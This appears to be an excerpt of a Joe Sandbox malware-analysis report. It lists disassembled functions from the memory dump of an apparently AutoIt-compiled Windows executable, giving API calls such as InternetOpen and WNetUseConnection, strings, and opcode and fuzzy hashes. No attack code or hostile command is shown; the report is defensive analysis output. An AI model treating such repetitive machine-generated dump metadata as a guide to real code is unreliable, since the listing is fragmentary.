                                                                                              • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                              • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                              • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 00472B63
                                                                                              • GetDC.USER32(00000000), ref: 00472B6C
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                              • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
APIs
• GetDesktopWindow.USER32 ref: 00472BB2
• GetDC.USER32(00000000), ref: 00472BBB
• GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
• ReleaseDC.USER32(00000000,?), ref: 00472BE8
Similarity
• API ID: CapsDesktopDeviceReleaseWindow
• String ID:
• API String ID: 2889604237-0
APIs
• __getptd_noexit.LIBCMT ref: 00415150
  • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
  • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
  • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
  • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
  • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
• CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
• __freeptd.LIBCMT ref: 0041516B
• ExitThread.KERNEL32 ref: 00415173
Similarity
• API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
• String ID:
• API String ID: 1454798553-0
APIs
Strings
Similarity
• API ID: _strncmp
• String ID: Q\E
• API String ID: 909875538-2189900498
APIs
• OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
Strings
Similarity
• API ID: Variant$Copy$ContainedObject$ClearErrorLast_malloc
• String ID: AutoIt3GUI$Container
• API String ID: 2652923123-3941886329
APIs
Strings
Similarity
• API ID: _memmove_strncmp
• String ID: U$\
• API String ID: 2666721431-100911408
APIs
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• __wcsnicmp.LIBCMT ref: 00467288
• WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 0046732E
Strings
Similarity
• API ID: Connection__wcsnicmp_wcscpy_wcslen
• String ID: LPT
• API String ID: 3035604524-1350329615
APIs
Strings
Similarity
• API ID: _memmove
• String ID: \$h
• API String ID: 4104443479-677774858
APIs
Strings
                                                                                              Similarity
                                                                                              • API ID: _memcmp
                                                                                              • String ID: &
                                                                                              • API String ID: 2931989736-1010288
                                                                                              • Opcode ID: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                              • Instruction ID: 5cd53615f07abd051f481cac668b43ae4088e938354b3ed51608dfeeaf990cc9
                                                                                              • Opcode Fuzzy Hash: a81d5415846f9cf6a42c700ef8b5aeadd08d018be41d214ef7d3fe054b701e0f
                                                                                              • Instruction Fuzzy Hash: EC517BB1A0011A9FDB18CF95D891ABFB7B5FF88300F14915AE815A7344D278AE42CBA4
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: \
                                                                                              • API String ID: 4104443479-2967466578
                                                                                              • Opcode ID: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                              • Instruction ID: e0e732097d18f8f10327b86eac3a97b4532b2e4be511d275227a7a0ca48fbcca
                                                                                              • Opcode Fuzzy Hash: 59d63d8f709c00c8b633315d640480ed85dcad38184220530ca382b626518ab4
                                                                                              • Instruction Fuzzy Hash: 2451C570E002498FEF24CFA9C8902AEFBB2BF95314F28826BD45597385D7395D86CB45
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 00466825
                                                                                              • InternetCrackUrlW.WININET(?,00000000,?), ref: 0046682F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_wcslen
                                                                                              • String ID: |
                                                                                              • API String ID: 596671847-2343686810
                                                                                              • Opcode ID: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                              • Instruction ID: c4ea99685e293915e64884ba1c360efc28696701351dc191072b09a6dd262d67
                                                                                              • Opcode Fuzzy Hash: 629f28f3e202f2691df4b53306abf03f6cbb1f7e83fd6186c7c4399916927608
                                                                                              • Instruction Fuzzy Hash: B1415076E10209ABDB00EFA5D881BEEB7B8FF58314F00002AE604A7291D7757916CBE5
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00448446
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044845F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                              • Instruction ID: ddf1801fc3b7a37e921bcadc6f33ff454999d78e89978ed9e0859c1643e2593c
                                                                                              • Opcode Fuzzy Hash: 21874a52306f08f821648492a7afc6200e27140433d35547b734f0a4523aa872
                                                                                              • Instruction Fuzzy Hash: 46418E71A002099FDB04CF98D880AEEB7B5FF59300F14816EED04AB341DB756952CFA5
                                                                                              APIs
                                                                                              • _strlen.LIBCMT ref: 0040F858
                                                                                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8C9
                                                                                                • Part of subcall function 0040F880: _memmove.LIBCMT ref: 0040F8E3
                                                                                              • _sprintf.LIBCMT ref: 0040F9AE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$_sprintf_strlen
                                                                                              • String ID: %02X
                                                                                              • API String ID: 1921645428-436463671
                                                                                              • Opcode ID: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                              • Instruction ID: e5a937a20bc973e7022889ba35624413ac66f4a4f80aeb0e2d5e31f1d02bff57
                                                                                              • Opcode Fuzzy Hash: 767cb60b44986bc828a60f9d0ec6f7d4d26665b5612a1b4657e1e4afb2f114d1
                                                                                              • Instruction Fuzzy Hash: 3E21287270021436D724B66E8C82FDAB39CAF55744F50007FF501A76C1EABCBA1983AD
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0045109A
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004510A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                              • Instruction ID: 528d1b292af097fd122ed4be4541c74d7578eb88e117dd2fe935d7ad7cd5862b
                                                                                              • Opcode Fuzzy Hash: 1b8a1482498e59a9e674e96fd5fabaeacd2ddbb1f8abcd0cc85bd7074ae773d5
                                                                                              • Instruction Fuzzy Hash: 0A21A5716102096BEB10DE68DC85FDB3398EB59734F20431AFA24A72D1D3B9EC958768
                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 0045134A
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0045135A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                              • Instruction ID: 5a0e340068a0ba28dc4d1c90c86d8b7761b767731f3a1bde811fb9e5560a91dc
                                                                                              • Opcode Fuzzy Hash: 458bf78cb5436efb918afa53a1743a3d6784074bbf07c1e17ba5dfdf6e920bd9
                                                                                              • Instruction Fuzzy Hash: BB2190761102056BEB108F68D894FEB33ADEB89339F10471AFD64D36E1C279DC458B68
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 00476CB0
                                                                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00476CC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                              • Instruction ID: 7847cb5f82098321599ebf91c79b9dffd15eff11c36c925ad8cec94a5f412430
                                                                                              • Opcode Fuzzy Hash: e336f3d3cf010bdb765bf3cd25e4316ec625df5f035adc8ff92848a8f4c166eb
                                                                                              • Instruction Fuzzy Hash: 67217130508F0497C211BF6AAC4AB5E7BB8AF84B15F01886DF9C8A14D1DF745528C76F
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: htonsinet_addr
                                                                                              • String ID: 255.255.255.255
                                                                                              • API String ID: 3832099526-2422070025
                                                                                              • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                              • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                                              • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                                              • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmp
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: InternetOpen
                                                                                              • String ID: <local>
                                                                                              • API String ID: 2038078732-4266983199
                                                                                              • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                              • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                                              • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                                              • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock_memmove
                                                                                              • String ID: EA06
                                                                                              • API String ID: 1988441806-3962188686
                                                                                              • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                              • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                              • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                                              • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: u,D
                                                                                              • API String ID: 4104443479-3858472334
                                                                                              • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                              • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                                              • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                                              • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                                              APIs
                                                                                              • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • wsprintfW.USER32 ref: 0045612A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend_mallocwsprintf
                                                                                              • String ID: %d/%02d/%02d
                                                                                              • API String ID: 1262938277-328681919
                                                                                              • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                              • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                                              • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                                              • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                              APIs
                                                                                              • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                              • InternetCloseHandle.WININET ref: 00442668
                                                                                                • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                              • String ID: aeB
                                                                                              • API String ID: 857135153-906807131
                                                                                              • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                              • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                              • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                              • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                              APIs
                                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                              • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
